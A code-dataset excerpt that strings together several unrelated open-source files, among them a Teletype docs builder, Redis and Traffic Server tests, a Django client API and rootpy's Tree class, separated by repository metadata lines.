from common import list_ops, list_mods, validate_toml, get_tt_version
if (sys.version_info.major, sys.version_info.minor) < (3, 6):
raise Exception("need Python 3.6 or later")
THIS_FILE = Path(__file__).resolve()
ROOT_DIR = THIS_FILE.parent.parent
TEMPLATE_DIR = ROOT_DIR / "utils" / "templates"
DOCS_DIR = ROOT_DIR / "docs"
OP_DOCS_DIR = DOCS_DIR / "ops"
FONTS_DIR = ROOT_DIR / "utils" / "fonts"
TT_VERSION = get_tt_version()
VERSION_STR = " ".join(["Teletype", TT_VERSION["tag"], TT_VERSION["hash"],
"Documentation"])
env = jinja2.Environment(
autoescape=False,
loader=jinja2.FileSystemLoader(str(TEMPLATE_DIR)),
trim_blocks=True,
lstrip_blocks=True,
cache_size=0,
auto_reload=True
)
# determines the order in which sections are displayed
OPS_SECTIONS = [
"variables",
"hardware",
"patterns",
"controlflow",
"maths",
"metronome",
"delay",
"stack",
"queue",
"turtle",
"grid",
"ansible",
"whitewhale",
"meadowphysics",
"earthsea",
"orca",
"justfriends",
"telex_i",
"telex_o",
"er301",
"fader",
"wslash",
"matrixarchate"
]
def deep_merge_dict(source, destination):
for key, value in source.items():
if isinstance(value, dict):
node = destination.setdefault(key, {})
deep_merge_dict(value, node)
else:
destination[key] = value
return destination
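# Illustrative example (added comment): deep_merge_dict({'a': {'x': 1}}, {'a': {'y': 2}, 'b': 3})
# returns the destination dict as {'a': {'y': 2, 'x': 1}, 'b': 3}; nested keys from source are
# merged into destination, and existing plain values are overwritten on conflicts.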
def common_md():
print(f"Pandoc version: {pypandoc.get_pandoc_version()}")
print(f"Using docs directory: {DOCS_DIR}")
print(f"Using ops docs directory: {OP_DOCS_DIR}")
print()
op_table_template = env.get_template("op_table.jinja2.md")
op_extended_template = env.get_template("op_extended.jinja2.md")
output = ""
output += Path(DOCS_DIR / "intro.md") \
.read_text().replace("VERSION", TT_VERSION["tag"][1:]) + "\n\n"
output += Path(DOCS_DIR / "whats_new.md").read_text() + "\n\n"
output += Path(DOCS_DIR / "quickstart.md").read_text() + "\n\n"
output += Path(DOCS_DIR / "keys.md").read_text() + "\n\n"
output += Path(DOCS_DIR / "ops.md").read_text() + "\n\n"
all_ops = set(list_ops()) | set(list_mods())
all_ops_dict = {}
ops_with_docs = set()
for section in OPS_SECTIONS:
md_file = Path(OP_DOCS_DIR, section + ".md")
toml_file = Path(OP_DOCS_DIR, section + ".toml")
output += "\\newpage\n"
if md_file.exists() and md_file.is_file():
print(f"Reading {md_file}")
output += md_file.read_text() + "\n\n"
output += "\n"
if toml_file.exists() and toml_file.is_file():
print(f"Reading {toml_file}")
extended = []
# n.b. Python 3.6 dicts maintain insertion order
ops = toml.loads(toml_file.read_text())
validate_toml(ops)
deep_merge_dict(ops, all_ops_dict)
for key in ops:
if key not in all_ops:
print(f" - WARNING: unknown {key}")
ops_with_docs.add(key)
if "aliases" in ops[key]:
ops_with_docs |= set(ops[key]["aliases"])
if "description" in ops[key]:
render = op_extended_template.render(name=key, **ops[key])
extended.append((key, render))
output += op_table_template.render(ops=ops.values())
output += "\n"
output += "\n".join([e[1] for e in extended]) + "\n\n"
output += Path(DOCS_DIR / "advanced.md").read_text() + "\n\n"
output += "\\appendix\n\n"
output += "# Alphabetical list of OPs and MODs\n\n"
sorted_ops = [kv[1] for kv in sorted(all_ops_dict.items())]
output += op_table_template.render(ops=sorted_ops)
output += "\n\n# Missing documentation\n\n"
missing_ops = all_ops - ops_with_docs
output += ", ".join([f"`{o}`" for o in sorted(missing_ops)]) + "\n\n"
output += Path(ROOT_DIR / "CHANGELOG.md").read_text() + "\n\n"
return output
def main():
if len(sys.argv) <= 1:
sys.exit("Please supply a filename")
input_format = "markdown"
output = common_md()
print()
for arg in sys.argv[1:]:
p = Path(arg).resolve()
print(f"Generating: {p}")
ext = p.suffix
if ext == ".md":
p.write_text(output)
elif ext == ".html":
output = "# " + VERSION_STR + "\n\n" + output
pypandoc.convert_text(
output,
format=input_format,
to="html5",
outputfile=str(p),
extra_args=["--standalone",
"--self-contained",
"--toc",
"--toc-depth=2",
"--css=" + str(TEMPLATE_DIR / "docs.css"),
"--template=" + str(TEMPLATE_DIR /
"template.html5")])
elif ext == ".pdf" or ext == ".tex":
latex_preamble = env.get_template("latex_preamble.jinja2.md")
latex = latex_preamble \
.render(title=VERSION_STR, fonts_dir=FONTS_DIR) + "\n\n"
latex += output
pandoc_version = int(pypandoc.get_pandoc_version()[0])
engine = ("--pdf-engine=xelatex"
if pandoc_version >= 2
else "--latex-engine=xelatex")
pypandoc.convert_text(
latex,
format=input_format,
to=ext[1:],
outputfile=str(p),
extra_args=["--standalone",
"--column=80",
"--toc",
"--toc-depth=2",
engine,
"--variable=papersize:A4"])
if __name__ == "__main__":
main()
| gpl-2.0 | -4,714,646,216,518,015,000 | 29.671717 | 78 | 0.513091 | false |
mylokin/redisext | tests/test_expire.py | 1 | 1260 | from __future__ import absolute_import
import redisext.counter
import redisext.key
import redisext.serializer
from . import fixture
class ExpireCounter(redisext.counter.Counter, redisext.key.Expire):
EXPIRE = 60
CONNECTION = fixture.Connection
SERIALIZER = redisext.serializer.Numeric
class ExpireCounterTestCase(fixture.TestCase):
def setUp(self):
self.counter = ExpireCounter('key')
self.counter.incr()
self.counter.expire()
def test_expire(self):
self.assertTrue(60 >= self.counter.ttl() > 0)
def test_persist(self):
self.counter.persist()
self.assertEqual(self.counter.ttl(), -1)
class UnspecifiedExpireCounter(redisext.counter.Counter, redisext.key.Expire):
CONNECTION = fixture.Connection
SERIALIZER = redisext.serializer.Numeric
class UnspecifiedExpireCounterTestCase(fixture.TestCase):
def setUp(self):
self.counter = UnspecifiedExpireCounter('key')
def test_expire_unspecified(self):
self.counter.incr()
with self.assertRaises(ValueError):
self.counter.expire()
def test_expire_specified(self):
self.counter.incr()
self.counter.expire(60)
self.assertTrue(60 >= self.counter.ttl() > 0)
| mit | -488,243,151,904,911,100 | 25.808511 | 78 | 0.694444 | false |
wcmckee/lcacoffee | hostassign.py | 1 | 2135 |
# coding: utf-8
# script to assign hostname and ip address to machine
# In[63]:
import os
import random
import json
import shutil
# In[37]:
colordir = os.listdir('/home/wcmckee/colortest/')
# In[42]:
alcolrz = []
# In[43]:
for cold in colordir:
#print cold
if '.json' in cold:
print cold
alcolrz.append(cold)
# In[47]:
alranza = random.choice(alcolrz)
# In[48]:
alranza
# In[71]:
checkexist = os.listdir('/home/wcmckee/colortest/assignedhosts/')
assignedh = []
# In[72]:
for chex in checkexist:
print chex
assignedh.append(chex)
#os.remove('/home/wcmckee/colortest/' + chex)
# In[73]:
colordir
# In[80]:
assignedh
# In[83]:
toremvz = set(colordir) & set(assignedh)
# In[88]:
tolidt = list(toremvz)
# In[91]:
for tolid in tolidt:
print tolid
os.remove('/home/wcmckee/colortest/' + tolid)
# In[ ]:
# In[ ]:
# In[89]:
tolidt
# In[50]:
opjsflz = open('/home/wcmckee/colortest/' + alranza, 'r')
# In[51]:
nerza = opjsflz.read()
# In[53]:
nerza
# In[55]:
neadict = json.loads(nerza)
# In[8]:
opipdy = open('/home/wcmckee/colortest/freeip.txt', 'r')
iprdy = opipdy.read()
# In[12]:
ipclean = iprdy.replace('\n', ', ')
# In[13]:
ipclean
# In[15]:
ipliszq = ipclean.split(',')
# In[23]:
# New hostname is element zero of the list. Need to remove it from the list now
newhos = ipliszq[0]
# In[24]:
newhos
# In[57]:
neadict.update({'ipaddress' : newhos})
# In[58]:
neadict
# In[60]:
convjsn = json.dumps(neadict)
# In[62]:
convjsn
convipdy = open('/home/wcmckee/colortest/' + alranza, 'w')
convipdy.write(convjsn)
convipdy.close()
# In[64]:
shutil.move('/home/wcmckee/colortest/' + alranza, '/home/wcmckee/colortest/assignedhosts/')
# In[ ]:
#shutil.move('/home/wcmckee/colortest/' + alranza, '/home/wcmckee/colortest/assignedhosts/')
# In[29]:
newlisav = ipliszq[1:]
# In[35]:
newlisav
newfre = open('/home/wcmckee/colortest/freeip.txt', 'w')
for lisaw in newlisav:
#print lispo
newfre.write(str(lisaw))
newfre.write('\n')
newfre.close()
# In[19]:
for ipzq in ipliszq:
print ipzq
# In[ ]:
| mit | -519,248,271,010,210,700 | 9.023474 | 92 | 0.620141 | false |
Instanssi/Instanssi.org | Instanssi/screenshow/migrations/0003_auto_20210511_0020.py | 1 | 1515 | # Generated by Django 3.2.2 on 2021-05-10 21:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('screenshow', '0002_auto_20180711_2110'),
]
operations = [
migrations.AlterField(
model_name='ircmessage',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='message',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='npsong',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='playlistvideo',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='screenconfig',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='sponsor',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| mit | -6,303,775,865,883,706,000 | 34.232558 | 111 | 0.588779 | false |
pbchou/trafficserver | tests/gold_tests/pluginTest/traffic_dump/traffic_dump.test.py | 1 | 13125 | """
Verify traffic_dump functionality.
"""
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
Test.Summary = '''
Verify traffic_dump functionality.
'''
Test.SkipUnless(
Condition.PluginExists('traffic_dump.so'),
)
# Configure the origin server.
replay_file = "replay/traffic_dump.yaml"
server = Test.MakeVerifierServerProcess(
"server", replay_file,
ssl_cert="ssl/server_combined.pem", ca_cert="ssl/signer.pem")
# Define ATS and configure it.
ts = Test.MakeATSProcess("ts", enable_tls=True)
replay_dir = os.path.join(ts.RunDirectory, "ts", "log")
ts.addSSLfile("ssl/server.pem")
ts.addSSLfile("ssl/server.key")
ts.addSSLfile("ssl/signer.pem")
ts.Setup.Copy("ssl/signed-foo.pem")
ts.Setup.Copy("ssl/signed-foo.key")
ts.Disk.records_config.update({
'proxy.config.diags.debug.enabled': 1,
'proxy.config.diags.debug.tags': 'traffic_dump',
'proxy.config.http.insert_age_in_response': 0,
'proxy.config.ssl.server.cert.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.ssl.server.private_key.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.url_remap.pristine_host_hdr': 1,
'proxy.config.ssl.CA.cert.filename': '{0}/signer.pem'.format(ts.Variables.SSLDir),
'proxy.config.exec_thread.autoconfig.scale': 1.0,
'proxy.config.http.host_sni_policy': 2,
'proxy.config.ssl.TLSv1_3': 0,
'proxy.config.ssl.client.verify.server.policy': 'PERMISSIVE',
})
ts.Disk.ssl_multicert_config.AddLine(
'dest_ip=* ssl_cert_name=server.pem ssl_key_name=server.key'
)
ts.Disk.remap_config.AddLine(
'map https://www.client_only_tls.com/ http://127.0.0.1:{0}'.format(server.Variables.http_port)
)
ts.Disk.remap_config.AddLine(
'map https://www.tls.com/ https://127.0.0.1:{0}'.format(server.Variables.https_port)
)
ts.Disk.remap_config.AddLine(
'map / http://127.0.0.1:{0}'.format(server.Variables.http_port)
)
# Configure traffic_dump.
ts.Disk.plugin_config.AddLine(
'traffic_dump.so --logdir {0} --sample 1 --limit 1000000000 '
'--sensitive-fields "cookie,set-cookie,x-request-1,x-request-2"'.format(replay_dir)
)
# Configure logging of transactions. This is helpful for the cache test below.
ts.Disk.logging_yaml.AddLines(
'''
logging:
formats:
- name: basic
format: "%<cluc>: Read result: %<crc>:%<crsc>:%<chm>, Write result: %<cwr>"
logs:
- filename: transactions
format: basic
'''.split('\n'))
# Set up trafficserver expectations.
ts.Disk.diags_log.Content = Testers.ContainsExpression(
"loading plugin.*traffic_dump.so",
"Verify the traffic_dump plugin got loaded.")
ts.Streams.stderr = Testers.ContainsExpression(
"Initialized with log directory: {0}".format(replay_dir),
"Verify traffic_dump initialized with the configured directory.")
ts.Streams.stderr += Testers.ContainsExpression(
"Initialized with sample pool size 1 bytes and disk limit 1000000000 bytes",
"Verify traffic_dump initialized with the configured disk limit.")
ts.Streams.stderr += Testers.ContainsExpression(
"Finish a session with log file of.*bytes",
"Verify traffic_dump sees the end of sessions and accounts for it.")
# Set up the json replay file expectations.
replay_file_session_1 = os.path.join(replay_dir, "127", "0000000000000000")
ts.Disk.File(replay_file_session_1, exists=True)
replay_file_session_2 = os.path.join(replay_dir, "127", "0000000000000001")
ts.Disk.File(replay_file_session_2, exists=True)
replay_file_session_3 = os.path.join(replay_dir, "127", "0000000000000002")
ts.Disk.File(replay_file_session_3, exists=True)
replay_file_session_4 = os.path.join(replay_dir, "127", "0000000000000003")
ts.Disk.File(replay_file_session_4, exists=True)
replay_file_session_5 = os.path.join(replay_dir, "127", "0000000000000004")
ts.Disk.File(replay_file_session_5, exists=True)
replay_file_session_6 = os.path.join(replay_dir, "127", "0000000000000005")
ts.Disk.File(replay_file_session_6, exists=True)
replay_file_session_7 = os.path.join(replay_dir, "127", "0000000000000006")
ts.Disk.File(replay_file_session_7, exists=True)
replay_file_session_8 = os.path.join(replay_dir, "127", "0000000000000007")
ts.Disk.File(replay_file_session_8, exists=True)
replay_file_session_9 = os.path.join(replay_dir, "127", "0000000000000008")
ts.Disk.File(replay_file_session_9, exists=True)
replay_file_session_10 = os.path.join(replay_dir, "127", "0000000000000009")
ts.Disk.File(replay_file_session_10, exists=True)
# Execute the first transaction. We limit the threads to 1 so that the sessions
# are run in serial.
tr = Test.AddTestRun("Run the test traffic.")
tr.AddVerifierClientProcess(
"client", replay_file, http_ports=[ts.Variables.port],
https_ports=[ts.Variables.ssl_port],
ssl_cert="ssl/server_combined.pem", ca_cert="ssl/signer.pem",
other_args='--thread-limit 1')
tr.Processes.Default.StartBefore(server)
tr.Processes.Default.StartBefore(ts)
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 1: Verify the correct behavior of two transactions across two sessions.
#
# Verify the properties of the replay file for the first transaction.
tr = Test.AddTestRun("Verify the json content of the first session")
http_protocols = "tcp,ip"
verify_replay = "verify_replay.py"
sensitive_fields_arg = (
"--sensitive-fields cookie "
"--sensitive-fields set-cookie "
"--sensitive-fields x-request-1 "
"--sensitive-fields x-request-2 ")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = \
('python3 {0} {1} {2} {3} --client-http-version "1.1" '
'--client-protocols "{4}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_1,
sensitive_fields_arg,
http_protocols))
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
# Verify the properties of the replay file for the second transaction.
tr = Test.AddTestRun("Verify the json content of the second session")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = \
('python3 {0} {1} {2} {3} --client-http-version "1.1" '
'--request-target "/two"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_2,
sensitive_fields_arg))
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 2: Verify the correct behavior of an explicit path in the request line.
#
# Verify recording of a request target with the host specified.
tr = Test.AddTestRun("Verify the replay file has the explicit target.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = "python3 {0} {1} {2} {3} --request-target '{4}'".format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_3,
sensitive_fields_arg,
"http://www.some.host.com/candy")
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 3: Verify correct handling of a POST with body data.
#
tr = Test.AddTestRun("Verify the client-request size node for a request with a body.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
size_of_verify_replay_file = os.path.getsize(os.path.join(Test.TestDirectory, verify_replay))
expected_body_size = 12345
tr.Processes.Default.Command = \
"python3 {0} {1} {2} {3} --client-request-size {4}".format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_4,
sensitive_fields_arg,
expected_body_size)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 4: Verify correct handling of a response produced out of the cache.
#
tr = Test.AddTestRun("Verify that the cached response's replay file looks appropriate.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = 'python3 {0} {1} {2} --client-protocols "{3}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_6,
http_protocols)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 5: Verify correct handling of two transactions in a session.
#
tr = Test.AddTestRun("Verify the dump file of two transactions in a session.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = 'python3 {0} {1} {2} --client-protocols "{3}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_7,
http_protocols)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 6: Verify correct protocol dumping of a TLS connection.
#
tr = Test.AddTestRun("Verify the client protocol stack of a TLS session.")
https_protocols = "tls,tcp,ip"
client_tls_features = "sni:www.tls.com,proxy-verify-mode:0,proxy-provided-cert:true"
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = 'python3 {0} {1} {2} --client-protocols "{3}" --client-tls-features "{4}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_8,
https_protocols,
client_tls_features)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr = Test.AddTestRun("Verify the server TLS protocol stack.")
https_server_stack = "http,tls,tcp,ip"
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
server_tls_features = 'proxy-provided-cert:false,sni:www.tls.com,proxy-verify-mode:1'
tr.Processes.Default.Command = 'python3 {0} {1} {2} --server-protocols "{3}" --server-tls-features "{4}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_8,
https_server_stack,
server_tls_features)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 7: Verify correct protocol dumping of TLS and HTTP/2 connections.
#
tr = Test.AddTestRun("Verify the client HTTP/2 protocol stack.")
h2_protocols = "http,tls,tcp,ip"
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = \
('python3 {0} {1} {2} --client-http-version "2" '
'--client-protocols "{3}" --client-tls-features "{4}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_9,
h2_protocols,
client_tls_features))
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr = Test.AddTestRun("Verify the server HTTP/2 protocol stack.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = 'python3 {0} {1} {2} --server-protocols "{3}" --server-tls-features "{4}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_9,
https_server_stack,
server_tls_features)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
#
# Test 8: Verify correct protocol dumping of client-side TLS and server-side HTTP.
#
tr = Test.AddTestRun("Verify the client TLS protocol stack.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
tr.Processes.Default.Command = 'python3 {0} {1} {2} --client-http-version "1.1" --client-protocols "{3}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_10,
https_protocols)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr = Test.AddTestRun("Verify the server HTTP protocol stack.")
tr.Setup.CopyAs(verify_replay, Test.RunDirectory)
http_server_stack = "http,tcp,ip"
tr.Processes.Default.Command = 'python3 {0} {1} {2} --server-protocols "{3}"'.format(
verify_replay,
os.path.join(Test.Variables.AtsTestToolsDir, 'lib', 'replay_schema.json'),
replay_file_session_10,
http_server_stack)
tr.Processes.Default.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
| apache-2.0 | 4,098,258,036,521,817,600 | 38.296407 | 113 | 0.721676 | false |
tabalinas/jsgrid-django | clients/views.py | 1 | 1522 | from django.http import HttpResponse
from django.core import serializers
from django.shortcuts import render
from simple_rest import Resource
from .models import Client
def index(request):
return render(request, 'index.html')
class Clients(Resource):
def get(self, request):
clients = Client.objects.all() \
.filter(name__contains = request.GET.get('name')) \
            .filter(address__contains = request.GET.get('address'))
return HttpResponse(self.to_json(clients), content_type = 'application/json', status = 200)
def post(self, request):
Client.objects.create(
name = request.POST.get("name"),
age = request.POST.get("age"),
address = request.POST.get("address"),
married = True if request.POST.get("married") == 'true' else False
)
return HttpResponse(status = 201)
def put(self, request, client_id):
client = Client.objects.get(pk = client_id)
client.name = request.PUT.get("name")
client.age = request.PUT.get("age")
client.address = request.PUT.get("address")
client.married = True if request.PUT.get("married") == 'true' else False
client.save()
return HttpResponse(status = 200)
def delete(self, request, client_id):
client = Client.objects.get(pk = client_id)
client.delete()
return HttpResponse(status = 200)
def to_json(self, objects):
return serializers.serialize('json', objects)
| mit | -5,578,314,184,561,130,000 | 32.822222 | 99 | 0.631406 | false |
qbuat/rootpy | rootpy/tree/tree.py | 1 | 33528 | # Copyright 2012 the rootpy developers
# distributed under the terms of the GNU General Public License
from __future__ import absolute_import
import sys
import re
import fnmatch
import uuid
import ROOT
from .. import log; log = log[__name__]
from .. import asrootpy, QROOT
from ..extern.ordereddict import OrderedDict
from ..context import set_directory, thread_specific_tmprootdir, do_nothing
from ..base import NamedObject
from ..decorators import snake_case_methods, method_file_check, method_file_cd
from ..plotting.base import Plottable
from ..plotting import Hist, Canvas
from ..memory.keepalive import keepalive
from .cut import Cut
from .treebuffer import TreeBuffer
from .treetypes import Scalar, Array, BaseChar
from .model import TreeModel
__all__ = [
'Tree',
'Ntuple',
]
class UserData(object):
pass
class BaseTree(NamedObject):
DRAW_PATTERN = re.compile(
'^(?P<branches>.+?)'
'(?P<redirect>\>\>[\+]?'
'(?P<name>[^\(]+)'
'(?P<binning>.+)?)?$')
def _post_init(self):
"""
The standard rootpy _post_init method that is used to initialize both
new Trees and Trees retrieved from a File.
"""
if not hasattr(self, '_buffer'):
# only set _buffer if model was not specified in the __init__
self._buffer = TreeBuffer()
self.read_branches_on_demand = False
self._branch_cache = {}
self._current_entry = 0
self._always_read = []
self.userdata = UserData()
self._inited = True
def always_read(self, branches):
"""
Always read these branches, even when in caching mode. Maybe you have
caching enabled and there are branches you want to be updated for each
entry even though you never access them directly. This is useful if you
are iterating over an input tree and writing to an output tree sharing
the same TreeBuffer and you want a direct copy of certain branches. If
you have caching enabled but these branches are not specified here and
never accessed then they will never be read from disk, so the values of
branches in memory will remain unchanged.
Parameters
----------
branches : list, tuple
these branches will always be read from disk for every GetEntry
"""
if type(branches) not in (list, tuple):
raise TypeError("branches must be a list or tuple")
self._always_read = branches
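    # Illustrative sketch (the branch names are made up, not part of rootpy):
    # when reading branches on demand and copying entries into an output tree
    # that shares this buffer, mark the branches that must always be refreshed
    # even if they are never accessed directly:
    #
    #     >>> intree.read_branches_on_demand = True
    #     >>> intree.always_read(['run_number', 'event_number'])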
@classmethod
def branch_type(cls, branch):
"""
Return the string representation for the type of a branch
"""
typename = branch.GetClassName()
if not typename:
leaf = branch.GetListOfLeaves()[0]
typename = leaf.GetTypeName()
# check if leaf has multiple elements
length = leaf.GetLen()
if length > 1:
typename = '{0}[{1:d}]'.format(typename, length)
return typename
@classmethod
def branch_is_supported(cls, branch):
"""
Currently the branch must only have one leaf but the leaf may have one
or multiple elements
"""
return branch.GetNleaves() == 1
def create_buffer(self, ignore_unsupported=False):
"""
Create this tree's TreeBuffer
"""
bufferdict = OrderedDict()
for branch in self.iterbranches():
# only include activated branches
if not self.GetBranchStatus(branch.GetName()):
continue
if not BaseTree.branch_is_supported(branch):
log.warning(
"ignore unsupported branch `{0}`".format(branch.GetName()))
continue
bufferdict[branch.GetName()] = Tree.branch_type(branch)
self.set_buffer(TreeBuffer(
bufferdict,
ignore_unsupported=ignore_unsupported))
def create_branches(self, branches):
"""
Create branches from a TreeBuffer or dict mapping names to type names
Parameters
----------
branches : TreeBuffer or dict
"""
if not isinstance(branches, TreeBuffer):
branches = TreeBuffer(branches)
self.set_buffer(branches, create_branches=True)
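    # Minimal sketch of creating branches from a plain dict of type codes
    # (the branch names and type codes here are illustrative assumptions):
    #
    #     >>> tree = Tree('example')
    #     >>> tree.create_branches({'x': 'F', 'n': 'I'})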
def update_buffer(self, treebuffer, transfer_objects=False):
"""
Merge items from a TreeBuffer into this Tree's TreeBuffer
Parameters
----------
buffer : rootpy.tree.buffer.TreeBuffer
The TreeBuffer to merge into this Tree's buffer
transfer_objects : bool, optional (default=False)
If True then all objects and collections on the input buffer will
be transferred to this Tree's buffer.
"""
self._buffer.update(treebuffer)
if transfer_objects:
self._buffer.set_objects(treebuffer)
def set_buffer(self, treebuffer,
branches=None,
ignore_branches=None,
create_branches=False,
visible=True,
ignore_missing=False,
ignore_duplicates=False,
transfer_objects=False):
"""
Set the Tree buffer
Parameters
----------
treebuffer : rootpy.tree.buffer.TreeBuffer
a TreeBuffer
branches : list, optional (default=None)
only include these branches from the TreeBuffer
ignore_branches : list, optional (default=None)
ignore these branches from the TreeBuffer
create_branches : bool, optional (default=False)
If True then the branches in the TreeBuffer should be created.
Use this option if initializing the Tree. A ValueError is raised
if an attempt is made to create a branch with the same name as one
that already exists in the Tree. If False the addresses of existing
branches will be set to point at the addresses in this buffer.
visible : bool, optional (default=True)
If True then the branches will be added to the buffer and will be
accessible as attributes of the Tree.
ignore_missing : bool, optional (default=False)
If True then any branches in this buffer that do not exist in the
Tree will be ignored, otherwise a ValueError will be raised. This
option is only valid when ``create_branches`` is False.
ignore_duplicates : bool, optional (default=False)
If False then raise a ValueError if the tree already has a branch
with the same name as an entry in the buffer. If True then skip
branches that already exist. This option is only valid when
``create_branches`` is True.
transfer_objects : bool, optional (default=False)
If True, all tree objects and collections will be transferred from
the buffer into this Tree's buffer.
"""
# determine branches to keep while preserving branch order
if branches is None:
branches = treebuffer.keys()
if ignore_branches is not None:
branches = [b for b in branches if b not in ignore_branches]
if create_branches:
for name in branches:
value = treebuffer[name]
if self.has_branch(name):
if ignore_duplicates:
log.warning(
"Skipping entry in buffer with the same name "
"as an existing branch: `{0}`".format(name))
continue
raise ValueError(
"Attempting to create two branches "
"with the same name: `{0}`".format(name))
if isinstance(value, Scalar):
self.Branch(name, value,
'{0}/{1}'.format(
name, value.type))
elif isinstance(value, Array):
self.Branch(name, value,
'{0}[{2:d}]/{1}'.format(
name, value.type, len(value)))
else:
self.Branch(name, value)
else:
for name in branches:
value = treebuffer[name]
if self.has_branch(name):
self.SetBranchAddress(name, value)
elif not ignore_missing:
raise ValueError(
"Attempting to set address for "
"branch `{0}` which does not exist".format(name))
else:
log.warning(
"Skipping entry in buffer for which no "
"corresponding branch in the "
"tree exists: `{0}`".format(name))
if visible:
newbuffer = TreeBuffer()
for branch in branches:
if branch in treebuffer:
newbuffer[branch] = treebuffer[branch]
newbuffer.set_objects(treebuffer)
self.update_buffer(newbuffer, transfer_objects=transfer_objects)
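    # Hedged sketch of the shared-buffer copy pattern described above: an
    # output tree adopts the input tree's buffer and creates matching branches
    # (tree and branch names are illustrative; ``_buffer`` is the internal
    # buffer attribute of this class):
    #
    #     >>> intree.create_buffer()
    #     >>> outtree.set_buffer(intree._buffer, create_branches=True)
    #     >>> for entry in intree:
    #     ...     if entry.x > 0:  # hypothetical branch
    #     ...         outtree.Fill()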
def activate(self, branches, exclusive=False):
"""
Activate branches
Parameters
----------
branches : str or list
branch or list of branches to activate
exclusive : bool, optional (default=False)
if True deactivate the remaining branches
"""
if exclusive:
self.SetBranchStatus('*', 0)
if isinstance(branches, basestring):
branches = [branches]
for branch in branches:
if '*' in branch:
matched_branches = self.glob(branch)
for b in matched_branches:
self.SetBranchStatus(b, 1)
elif self.has_branch(branch):
self.SetBranchStatus(branch, 1)
def deactivate(self, branches, exclusive=False):
"""
Deactivate branches
Parameters
----------
branches : str or list
branch or list of branches to deactivate
exclusive : bool, optional (default=False)
if True activate the remaining branches
"""
if exclusive:
self.SetBranchStatus('*', 1)
if isinstance(branches, basestring):
branches = [branches]
for branch in branches:
if '*' in branch:
matched_branches = self.glob(branch)
for b in matched_branches:
